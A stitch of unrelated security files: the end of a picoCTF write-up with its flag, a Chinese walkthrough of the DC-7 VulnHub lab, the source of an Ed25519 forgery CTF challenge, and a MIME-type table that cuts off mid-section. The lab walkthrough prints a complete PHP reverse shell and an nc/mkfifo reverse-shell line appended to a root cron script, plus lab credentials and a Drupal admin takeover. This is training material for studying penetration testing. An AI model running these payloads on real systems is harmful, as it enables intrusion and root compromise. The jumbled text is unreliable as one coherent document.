en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Pragma: no-cache Cache-Control: no-cache 542 HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2019 15:56:37 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 326 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /favicon.ico was not found on this server.</p> <hr> <address>Apache/2.4.29 (Ubuntu) Server at ec2-18-223-184-200.us-east-2.compute.amazonaws.com Port 443</address> </body></html> =================================================================== ``` This can also be done using the Wireshark GUI: Edit -> Preferences -> Protocols -> SSL (or TLS in newer versions) -> Edit RSA Key List -> Add new entry: ![](images/wirehsark_ssl.png) The flag is sent as one of the HTTP headers: ``` Pico-Flag: picoCTF{nongshim.shrimp.crackers} ```
sec-knowleage
# DC7-WalkThrough --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **靶机地址** - https://www.vulnhub.com/entry/dc-7,356/ **Description** DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn't an overly technical challenge, it isn't exactly easy. While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed. What you will need to do, is to think "outside" of the box. Waaaaaay "outside" of the box. :-) The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools. For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward. **Technical Information** DC-7 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs. I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this. It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP. Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go. **知识点** - php 弹 shell - 通过定时任务提权 **实验环境** `环境仅供参考` - VMware® Workstation 15 Pro - 15.0.0 build-10134415 - kali : NAT 模式,192.168.141.134 - 靶机 : NAT 模式 --- # 前期-信息收集 开始进行 IP 探活 ```bash nmap -sP 192.168.141.0/24 ``` 排除法,去掉自己、宿主机、网关, `192.168.141.142` 就是目标了 扫描开放端口 ```bash nmap -T5 -A -v -p- 192.168.141.142 ``` 开放了 SSH 和 WEB 服务,web 是 Drupal 搭建的站,和 DC1 的做法一样,测了几个 CVE,并没有成功 然后试了爆破账号和目录也没有结果,google 一圈后发现,尼玛需要去推特上搜索最底下的用户字符串 "DC7USER" 再找到他的 github 仓库 https://github.com/Dc7User/staffdb 看上去像是要代码审计?其实不是,里面有 config.php 其中有 mysql 凭证 ``` dc7user MdR3xOgB7#dW ``` 拿这个去连接它 mysql?扯淡,他没对外开数据库端口,那就用着连连其他的 后台登录不上,再换一个,之前扫出的 SSH 时下,果然成功 看看有没有可以利用的 数据库文件是 gpg 加密的,不管,看到有个邮件文件 ``` From root@dc-7 Thu Aug 29 17:00:22 2019 Return-path: <root@dc-7> Envelope-to: root@dc-7 Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000 Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3EPu-0000CV-5C for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000 From: root@dc-7 (Cron Daemon) To: root@dc-7 Subject: Cron <root@dc-7> /opt/scripts/backups.sh MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <LOGNAME=root> Message-Id: <E1i3EPu-0000CV-5C@dc-7> Date: Thu, 29 Aug 2019 17:00:22 +1000 Database dump saved to /home/dc7user/backups/website.sql [success] gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists From root@dc-7 Thu Aug 29 17:15:11 2019 Return-path: <root@dc-7> Envelope-to: root@dc-7 Delivery-date: Thu, 29 Aug 2019 17:15:11 +1000 Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3EeF-0000Dx-G1 for root@dc-7; Thu, 29 Aug 2019 17:15:11 +1000 From: root@dc-7 (Cron Daemon) To: root@dc-7 Subject: Cron <root@dc-7> /opt/scripts/backups.sh MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <LOGNAME=root> Message-Id: <E1i3EeF-0000Dx-G1@dc-7> Date: Thu, 29 Aug 2019 17:15:11 +1000 Database dump saved to /home/dc7user/backups/website.sql [success] gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists From root@dc-7 Thu Aug 29 17:30:11 2019 Return-path: <root@dc-7> Envelope-to: root@dc-7 Delivery-date: Thu, 29 Aug 2019 17:30:11 +1000 Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3Esl-0000Ec-JQ for root@dc-7; Thu, 29 Aug 2019 17:30:11 +1000 From: root@dc-7 (Cron Daemon) To: root@dc-7 Subject: Cron <root@dc-7> /opt/scripts/backups.sh MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <LOGNAME=root> Message-Id: <E1i3Esl-0000Ec-JQ@dc-7> Date: Thu, 29 Aug 2019 17:30:11 +1000 Database dump saved to /home/dc7user/backups/website.sql [success] gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists From root@dc-7 Thu Aug 29 17:45:11 2019 Return-path: <root@dc-7> Envelope-to: root@dc-7 Delivery-date: Thu, 29 Aug 2019 17:45:11 +1000 Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3F7H-0000G3-Nb for root@dc-7; Thu, 29 Aug 2019 17:45:11 +1000 From: root@dc-7 (Cron Daemon) To: root@dc-7 Subject: Cron <root@dc-7> /opt/scripts/backups.sh MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <LOGNAME=root> Message-Id: <E1i3F7H-0000G3-Nb@dc-7> Date: Thu, 29 Aug 2019 17:45:11 +1000 Database dump saved to /home/dc7user/backups/website.sql [success] gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists From root@dc-7 Thu Aug 29 20:45:21 2019 Return-path: <root@dc-7> Envelope-to: root@dc-7 Delivery-date: Thu, 29 Aug 2019 20:45:21 +1000 Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3Hvd-0000ED-CP for root@dc-7; Thu, 29 Aug 2019 20:45:21 +1000 From: root@dc-7 (Cron Daemon) To: root@dc-7 Subject: Cron <root@dc-7> /opt/scripts/backups.sh MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <LOGNAME=root> Message-Id: <E1i3Hvd-0000ED-CP@dc-7> Date: Thu, 29 Aug 2019 20:45:21 +1000 Database dump saved to /home/dc7user/backups/website.sql [success] gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists From root@dc-7 Thu Aug 29 22:45:17 2019 Return-path: <root@dc-7> Envelope-to: root@dc-7 Delivery-date: Thu, 29 Aug 2019 22:45:17 +1000 Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3Jng-0000Iw-Rq for root@dc-7; Thu, 29 Aug 2019 22:45:16 +1000 From: root@dc-7 (Cron Daemon) To: root@dc-7 Subject: Cron <root@dc-7> /opt/scripts/backups.sh MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <LOGNAME=root> Message-Id: <E1i3Jng-0000Iw-Rq@dc-7> Date: Thu, 29 Aug 2019 22:45:16 +1000 Database dump saved to /home/dc7user/backups/website.sql [success] From root@dc-7 Thu Aug 29 23:00:12 2019 Return-path: <root@dc-7> Envelope-to: root@dc-7 Delivery-date: Thu, 29 Aug 2019 23:00:12 +1000 Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3K28-0000Ll-11 for root@dc-7; Thu, 29 Aug 2019 23:00:12 +1000 From: root@dc-7 (Cron Daemon) To: root@dc-7 Subject: Cron <root@dc-7> /opt/scripts/backups.sh MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <LOGNAME=root> Message-Id: <E1i3K28-0000Ll-11@dc-7> Date: Thu, 29 Aug 2019 23:00:12 +1000 Database dump saved to /home/dc7user/backups/website.sql [success] From root@dc-7 Fri Aug 30 00:15:18 2019 Return-path: <root@dc-7> Envelope-to: root@dc-7 Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000 Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3LCo-0000Eb-02 for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000 From: root@dc-7 (Cron Daemon) To: root@dc-7 Subject: Cron <root@dc-7> /opt/scripts/backups.sh MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <LOGNAME=root> Message-Id: <E1i3LCo-0000Eb-02@dc-7> Date: Fri, 30 Aug 2019 00:15:18 +1000 rm: cannot remove '/home/dc7user/backups/*': No such file or directory Database dump saved to /home/dc7user/backups/website.sql [success] From root@dc-7 Fri Aug 30 03:15:17 2019 Return-path: <root@dc-7> Envelope-to: root@dc-7 Delivery-date: Fri, 30 Aug 2019 03:15:17 +1000 Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i3O0y-0000Ed-To for root@dc-7; Fri, 30 Aug 2019 03:15:17 +1000 From: root@dc-7 (Cron Daemon) To: root@dc-7 Subject: Cron <root@dc-7> /opt/scripts/backups.sh MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <LOGNAME=root> Message-Id: <E1i3O0y-0000Ed-To@dc-7> Date: Fri, 30 Aug 2019 03:15:17 +1000 rm: cannot remove '/home/dc7user/backups/*': No such file or directory Database dump saved to /home/dc7user/backups/website.sql [success] ``` 看起来像是个定时任务的 log 其中大部分都是重复内容,告诉你文件夹没有,文件已经存在,不过一直在使用 `/opt/scripts/backups.sh` 这个脚本,看看 ``` cat /opt/scripts/backups.sh ``` 很好,提到了个工具 drush,DC1 补充里我通过 drush 修改 admin 用户的密码,来直接改 admin 密码 ``` cd /var/www/html drush user-password admin --password="admin" ``` 注意: 需要在 `/var/www/html` 目录下运行 drush 命令 --- # 中期-漏洞利用 登录后台,这里参考 https://www.sevenlayers.com/index.php/164-drupal-to-reverse-shell Drupal 后台提权的方法,进入 Manage-->Extend-->List-->Install new module 访问下载插件 https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz ,直接下载或手动上传都行,自选 上传成功后,点击 Enable newly added modules 到 FILTERS 选项,勾选 PHP Filter,点击下方的 Install 回到主页,在左边的 Tools 栏中点击 Add content -> Basic page,Text format 选择 PHP code 写入一个 php 反向 shell 即可 找到一个可以直接利用的 php 源码 http://pentestmonkey.net/tools/web-shells/php-reverse-shell ```php <?php set_time_limit (0); $VERSION = "1.0"; $ip = '192.168.141.134'; $port = 4444; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { // Fork and have the parent process exit $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?> ``` kali 监听 ``` nc -lvp 4444 ``` 点击 preview,成功回弹 --- # 后期-提权 和 dc7user 这个用户一样, www 用户也啥吊权限没有,只好把希望放在之前的备份脚本上 ``` cd /opt/scripts/ ls -l ``` 可见文件属组为 www-data,组权限 rwx,我们可以对脚本进行修改,期望通过定时任务尝试提权 kali 监听 ``` nc -lvp 5555 ``` 写入 payload ``` cd /opt/scripts/ echo "mkfifo /tmp/bqro; nc 192.168.141.134 5555 0</tmp/bqro | /bin/sh >/tmp/bqro 2>&1; rm /tmp/bqro" >> /opt/scripts/backups.sh cat backups.sh ``` 耐心等待几分钟,就反弹回来了 提权成功,感谢靶机作者 @DCUA7 --- # 补充 root 上去看了下定时任务,果然啊,竟然尼玛15分钟。。。。 --- 另外 pgp 可以解密出来 密钥好像是 PickYourOwnPassword 根据 /var/mail/dc7user 中邮件信息可以看出来
sec-knowleage
#define _POSIX_C_SOURCE 1 #include <stdlib.h> #include <stdio.h> #include <string.h> #include <stdbool.h> #include <unistd.h> #include <fcntl.h> #include <sys/random.h> #include <sys/sendfile.h> #include "tweetnacl.h" #define Q 1000 #define K 8 void randombytes(unsigned char *p, size_t n) { for (ssize_t r = 0; n -= r; p += r) if (0 > (r = getrandom(p, n, 0))) exit(-1); } static void print_hex(unsigned char const *p, size_t n) { for (size_t i = 0; i < n; ++i) printf("%02hhx", p[i]); } static size_t read_hex(unsigned char *p, size_t n) { for (size_t i = 0; i < n; ++i) if (1 != scanf("%02hhx", p + i)) return i; return n; } struct keypair { unsigned char pk[32], sk[32]; } __attribute__((packed)) keys[K]; void init_keys() { for (unsigned i = 0; i < K; ++i) crypto_sign_keypair(keys[i].pk, keys[i].sk); } unsigned find(unsigned char const *pk) { unsigned idx; for (idx = 0; idx < K; ++idx) if (!strncmp(pk, keys[idx].pk, 32)) break; return idx; } size_t sign(unsigned char *m, unsigned long long n, unsigned char const *pk, unsigned char const *sk) { struct keypair k; memcpy(k.sk, sk, sizeof(k.sk)); memcpy(k.pk, pk, sizeof(k.pk)); crypto_sign(m, &n, m, n, (char *) &k); return n; } bool verify(unsigned char const *sm, unsigned long long n, unsigned char const *pk) { char m[n]; return !crypto_sign_open(m, &n, sm, n, pk); } void dump_flag() { if (system("cat flag.txt")) { fprintf(stderr, "fl0g is kapot??\n"); exit(-1); } } int main() { init_keys(); printf("Welcome to the Ed25519 existential forgery game! Enjoy and good luck.\n"); for (unsigned i = 0; i < K; ++i) { printf("public key: "); print_hex(keys[i].pk, sizeof(keys[i].pk)); printf("\n"); } char nope[Q][256]; for (unsigned i = 0; i < Q; ++i) { char pk[32], m[320]; unsigned idx, n; printf("public key> "); fflush(stdout); if (sizeof(pk) != read_hex(pk, sizeof(pk)) || K == (idx = find(pk))) break; printf("length> "); fflush(stdout); if (1 != scanf("%u", &n) || n > 256) break; printf("message> "); fflush(stdout); if (n != read_hex(m, n)) break; memcpy(nope[i], m, n); memset(nope[i] + n, 0, sizeof(nope[i]) - n); printf("signed: "); print_hex(m, sign(m, n, keys[idx].sk, pk)); printf("\n"); } char sm[320]; printf("forgery> "); fflush(stdout); unsigned long long n = read_hex(sm, 320); for (unsigned i = 0; i < Q; ++i) { if (!memcmp(sm + 64, nope[i], n - 64)) { printf("nope!\n"); exit(0); } } for (unsigned i = 0; i < K; ++i) if (verify(sm, n, keys[i].pk)) { dump_flag(); exit(0); } printf("nope!\n"); }
sec-knowleage
# 文件 --- ## Content-Type Content-Type(内容类型),一般是指网页中存在的 Content-Type,用于定义网络文件的类型和网页的编码,决定浏览器将以什么形式、什么编码读取这个文件,这就是经常看到一些 PHP 网页点击的结果却是下载一个文件或一张图片的原因。 Content-Type 标头告诉客户端实际返回的内容的内容类型。 语法格式: ``` Content-Type: text/html; charset=utf-8 Content-Type: multipart/form-data; boundary=something ``` **HTTP content-type 对照表** | 文件扩展名 | Content-Type(Mime-Type) | | - | - | | .*( 二进制流) | application/octet-stream | | .001 | application/x-001 | | .323 | text/h323 | | .907 | drawing/907 | | .acp | audio/x-mei-aac | | .aif | audio/aiff | | .aiff | audio/aiff | | .asa | text/asa | | .asp | text/asp | | .au | audio/basic | | .awf | application/vnd.adobe.workflow | | .bmp | application/x-bmp | | .c4t | application/x-c4t | | .cal | application/x-cals | | .cdf | application/x-netcdf | | .cel | application/x-cel | | .cg4 | application/x-g4 | | .cit | application/x-cit | | .cml | text/xml | | .cmx | application/x-cmx | | .crl | application/pkix-crl | | .csi | application/x-csi | | .cut | application/x-cut | | .dbm | application/x-dbm | | .dcd | text/xml | | .der | application/x-x509-ca-cert | | .dib | application/x-dib | | .doc | application/msword | | .drw | application/x-drw | | .dwf | Model/vnd.dwf | | .dwg | application/x-dwg | | .dxf | application/x-dxf | | .emf | application/x-emf | | .ent | text/xml | | .eps | application/x-ps | | .etd | application/x-ebx | | .fax | image/fax | | .fif | application/fractals | | .frm | application/x-frm | | .gbr | application/x-gbr | | .gif | image/gif | | .gp4 | application/x-gp4 | | .hmr | application/x-hmr | | .hpl | application/x-hpl | | .hrf | application/x-hrf | | .htc | text/x-component | | .html | text/html | | .htx | text/html | | .ico | image/x-icon | | .iff | application/x-iff | | .igs | application/x-igs | | .img | application/x-img | | .isp | application/x-internet-signup | | .java | java/* | | .jpe | image/jpeg | | .jpeg | image/jpeg | | .jpg | application/x-jpg | | .jsp | text/html | | .lar | application/x-laplayer-reg | | .lavs | audio/x-liquid-secure | | .lmsff | audio/x-la-lms | | .ltr | application/x-ltr | | .m2v | video/x-mpeg | | .m4e | video/mpeg4 | | .man | application/x-troff-man | | .mdb | application/msaccess | | .mfp | application/x-shockwave-flash | | .mhtml | message/rfc822 | | .mid | audio/mid | | .mil | application/x-mil | | .mnd | audio/x-musicnet-download | | .mocha | application/x-javascript | | .mp1 | audio/mp1 | | .mp2v | video/mpeg | | .mp4 | video/mpeg4 | | .mpd | application/vnd.ms-project | | .mpeg | video/mpg | | .mpga | audio/rn-mpeg | | .mps | video/x-mpeg | | .mpv | video/mpg | | .mpw | application/vnd.ms-project | | .mtx | text/xml | | .net | image/pnetvue | | .nws | message/rfc822 | | .out | application/x-out | | .p12 | application/x-pkcs12 | | .p7c | application/pkcs7-mime | | .p7r | application/x-pkcs7-certreqresp | | .pc5 | application/x-pc5 | | .pcl | application/x-pcl | | .pdf | application/pdf | | .pdx | application/vnd.adobe.pdx | | .pgl | application/x-pgl | | .pko | application/vnd.ms-pki.pko | | .plg | text/html | | .plt | application/x-plt | | .png | application/x-png | | .ppa | application/vnd.ms-powerpoint | | .pps | application/vnd.ms-powerpoint | | .ppt | application/x-ppt | | .prf | application/pics-rules | | .prt | application/x-prt | | .ps | application/postscript | | .pwz | application/vnd.ms-powerpoint | | .ra | audio/vnd.rn-realaudio | | .ras | application/x-ras | | .rdf | text/xml | | .red | application/x-red | | .rjs | application/vnd.rn-realsystem-rjs | | .rlc | application/x-rlc | | .rm | application/vnd.rn-realmedia | | .rmi | audio/mid | | .rmm | audio/x-pn-realaudio | | .rms | application/vnd.rn-realmedia-secure | | .rmx | application/vnd.rn-realsystem-rmx | | .rp | image/vnd.rn-realpix | | .rsml | application/vnd.rn-rsml | | .rtf | application/msword | | .rv | video/vnd.rn-realvideo | | .sat | application/x-sat | | .sdw | application/x-sdw | | .slb | application/x-slb | | .slk | drawing/x-slk | | .smil | application/smil | | .snd | audio/basic | | .sor | text/plain | | .spl | application/futuresplash | | .ssm | application/streamingmedia | | .stl | application/vnd.ms-pki.stl | | .sty | application/x-sty | | .swf | application/x-shockwave-flash | | .tg4 | application/x-tg4 | | .tif | image/tiff | | .tiff | image/tiff | | .top | drawing/x-top | | .tsd | text/xml | | .uin | application/x-icq | | .vcf | text/x-vcard | | .vdx | application/vnd.visio | | .vpg | application/x-vpeg005 | | .vsd | application/x-vsd | | .vst | application/vnd.visio | | .vsw | application/vnd.visio | | .vtx | application/vnd.visio | | .wav | audio/wav | | .wb1 | application/x-wb1 | | .wb3 | application/x-wb3 | | .wiz | application/msword | | .wk4 | application/x-wk4 | | .wks | application/x-wks | | .wma | audio/x-ms-wma | | .wmf | application/x-wmf | | .wmv | video/x-ms-wmv | | .wmz | application/x-ms-wmz | | .wpd | application/x-wpd | | .wpl | application/vnd.ms-wpl | | .wr1 | application/x-wr1 | | .wrk | application/x-wrk | | .ws2 | application/x-ws | | .wsdl | text/xml | | .xdp | application/vnd.adobe.xdp | | .xfd | application/vnd.adobe.xfd | | .xhtml | text/html | | .xls | application/x-xls | | .xml | text/xml | | .xq | text/xml | | .xquery | text/xml | | .xsl | text/xml | | .xwd | application/x-xwd | | .sis | application/vnd.symbian.install | | .x_t | application/x-x_t | | .apk | application/vnd.android.package-archive | | .tif | image/tiff | | .301 | application/x-301 | | .906 | application/x-906 | | .a11 | application/x-a11 | | .ai | application/postscript | | .aifc | audio/aiff | | .anv | application/x-anv | | .asf | video/x-ms-asf | | .asx | video/x-ms-asf | | .avi | video/avi | | .biz | text/xml | | .bot | application/x-bot | | .c90 | application/x-c90 | | .cat | application/vnd.ms-pki.seccat | | .cdr | application/x-cdr | | .cer | application/x-x509-ca-cert | | .cgm | application/x-cgm | | .class | java/* | | .cmp | application/x-cmp | | .cot | application/x-cot | | .crt | application/x-x509-ca-cert | | .css | text/css | | .dbf | application/x-dbf | | .dbx | application/x-dbx | | .dcx | application/x-dcx | | .dgn | application/x-dgn | | .dll | application/x-msdownload | | .dot | application/msword | | .dtd | text/xml | | .dwf | application/x-dwf | | .dxb | application/x-dxb | | .edn | application/vnd.adobe.edn | | .eml | message/rfc822 | | .epi | application/x-epi | | .eps | application/postscript | | .exe | application/x-msdownload | | .fdf | application/vnd.fdf | | .fo | text/xml | | .g4 | application/x-g4 | | . | application/x- | | .gl2 | application/x-gl2 | | .hgl | application/x-hgl | | .hpg | application/x-hpgl | | .hqx | application/mac-binhex40 | | .hta | application/hta | | .htm | text/html | | .htt | text/webviewhtml | | .icb | application/x-icb | | .ico | application/x-ico | | .ig4 | application/x-g4 | | .iii | application/x-iphone | | .ins | application/x-internet-signup | | .IVF | video/x-ivf | | .jfif | image/jpeg | | .jpe | application/x-jpe | | .jpg | image/jpeg | | .js | application/x-javascript | | .la1 | audio/x-liquid-file | | .latex | application/x-latex | | .lbm | application/x-lbm | | .ls | application/x-javascript | | .m1v | video/x-mpeg | | .m3u | audio/mpegurl | | .mac | application/x-mac | | .math | text/xml | | .mdb | application/x-mdb | | .mht | message/rfc822 | | .mi | application/x-mi | | .midi | audio/mid | | .mml | text/xml | | .mns | audio/x-musicnet-stream | | .movie | video/x-sgi-movie | | .mp2 | audio/mp2 | | .mp3 | audio/mp3 | | .mpa | video/x-mpg | | .mpe | video/x-mpeg | | .mpg | video/mpg | | .mpp | application/vnd.ms-project | | .mpt | application/vnd.ms-project | | .mpv2 | video/mpeg | | .mpx | application/vnd.ms-project | | .mxp | application/x-mmxp | | .nrf | application/x-nrf | | .odc | text/x-ms-odc | | .p10 | application/pkcs10 | | .p7b | application/x-pkcs7-certificates | | .p7m | application/pkcs7-mime | | .p7s | application/pkcs7-signature | | .pci | application/x-pci | | .pcx | application/x-pcx | | .pdf | application/pdf | | .pfx | application/x-pkcs12 | | .pic | application/x-pic | | .pl | application/x-perl | | .pls | audio/scpls | | .png | image/png | | .pot | application/vnd.ms-powerpoint | | .ppm | application/x-ppm | | .ppt | application/vnd.ms-powerpoint | | .pr | application/x-pr | | .prn | application/x-prn | | .ps | application/x-ps | | .ptn | application/x-ptn | | .r3t | text/vnd.rn-realtext3d | | .ram | audio/x-pn-realaudio | | .rat | application/rat-file | | .rec | application/vnd.rn-recording | | .rgb | application/x-rgb | | .rjt | application/vnd.rn-realsystem-rjt | | .rle | application/x-rle | | .rmf | application/vnd.adobe.rmf | | .rmj | application/vnd.rn-realsystem-rmj | | .rmp | application/vnd.rn-rn_music_package | | .rmvb | application/vnd.rn-realmedia-vbr | | .rnx | application/vnd.rn-realplayer | | .rpm | audio/x-pn-realaudio-plugin | | .rt | text/vnd.rn-realtext | | .rtf | application/x-rtf | | .sam | application/x-sam | | .sdp | application/sdp | | .sit | application/x-stuffit | | .sld | application/x-sld | | .smi | application/smil | | .smk | application/x-smk | | .sol | text/plain | | .spc | application/x-pkcs7-certificates | | .spp | text/xml | | .sst | application/vnd.ms-pki.certstore | | .stm | text/html | | .svg | text/xml | | .tdf | application/x-tdf | | .tga | application/x-tga | | .tif | application/x-tif | | .tld | text/xml | | .torrent | application/x-bittorrent | | .txt | text/plain | | .uls | text/iuls | | .vda | application/x-vda | | .vml | text/xml | | .vsd | application/vnd.visio | | .vss | application/vnd.visio | | .vst | application/x-vst | | .vsx | application/vnd.visio | | .vxml | text/xml | | .wax | audio/x-ms-wax | | .wb2 | application/x-wb2 | | .wbmp | image/vnd.wap.wbmp | | .wk3 | application/x-wk3 | | .wkq | application/x-wkq | | .wm | video/x-ms-wm | | .wmd | application/x-ms-wmd | | .wml | text/vnd.wap.wml | | .wmx | video/x-ms-wmx | | .wp6 | application/x-wp6 | | .wpg | application/x-wpg | | .wq1 | application/x-wq1 | | .wri | application/x-wri | | .ws | application/x-ws | | .wsc | text/scriptlet | | .wvx | video/x-ms-wvx | | .xdr | text/xml | | .xfdf | application/vnd.adobe.xfdf | | .xls | application/vnd.ms-excel | | .xlw | application/x-xlw | | .xpl | audio/scpls | | .xql | text/xml | | .xsd | text/xml | | .xslt | text/xml | | .x_b | application/x-x_b | | .sisx | application/vnd.symbian.install | | .ipa | application/vnd.iphone | | .xap | application/x-silverlight-app | --- ## 跨域策略文件 - https://blog.csdn.net/gnail_oug/article/details/53488918 跨域,顾名思义就是需要的资源不在自己的域服务器上,需要访问其他域服务器。跨域策略文件是一个 xml 文档文件,主要是为 web 客户端(如 Adobe Flash Player 等)设置跨域处理数据的权限。打个比方说,公司 A 部门有一台公共的电脑,里面存放着一些资料文件,专门供 A 部门内成员自己使用,这样,A 部门内的员工就可以访问该电脑,其他部门人员则不允许访问。如下图: A 部门的员工可以任意访问 A 部门的公共电脑,但是不能直接访问 B 部门的公共电脑。有一天,B 部门领导觉得他们的资料非常有用,想要与 A 部门分享,于是就给 A 部门一个令牌,这样 A 部门的员工也可以访问 B 部门的公共电脑了。 换成系统,常见就如同下面所示: 上图是典型的跨域请求,业务服务器向图片服务器上传图片时就涉及到了跨域,要想能正常访问,图片服务器需要给业务服务器设置允许访问的权限。而这个权限设置就是跨域策略文件 `crossdomain.xml` 存在的意义。 **配置规则** - 